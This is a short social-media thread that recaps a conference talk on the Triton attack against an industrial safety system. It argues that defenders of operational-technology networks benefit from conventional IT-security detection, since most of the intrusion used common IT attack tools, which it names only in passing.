This was a fav session from #S4x19. I think @stvemillertime made several GREAT points about why IT Security techniques are important when defending OT environments. 1/n

9:48-10:22: If you want to detect an ICS attack as far left of boom as possible, you should look for the IT attack first. (Looking for the OT attack is dangerously late-stage.) 2/n

8:30-9:26: In the Triton attack, 99 compromised machines were Windows servers or workstations. Only 1 was the safety controller... 99% of detection opportunities are conventional detection opportunities. 3/n

5:42-8:04 The vast majority of the Triton attack used conventional (IT) tools like NMAP, Powershell-invoked Mimikatz, & Meterpreter, webshells, VPN compromise, cryptcat, plink-tunneled RDP, scheduled tasks for persistence, AD Explorer & other sysinternals. 4/n

Are OT-specific tools and experience valuable? Absolutely. Shout out to @electricfork and the absolute brain trust that @RobertMLee has built at @DragosInc. 5/n

What I am saying is that OT networks are not so unique that IT tools are useless. Purdue model alone won’t save you. And I talk to a LOT of OT networks owners that are woefully ignoring or underusing classes of good tools because they have blind faith in their segmentation. 6/6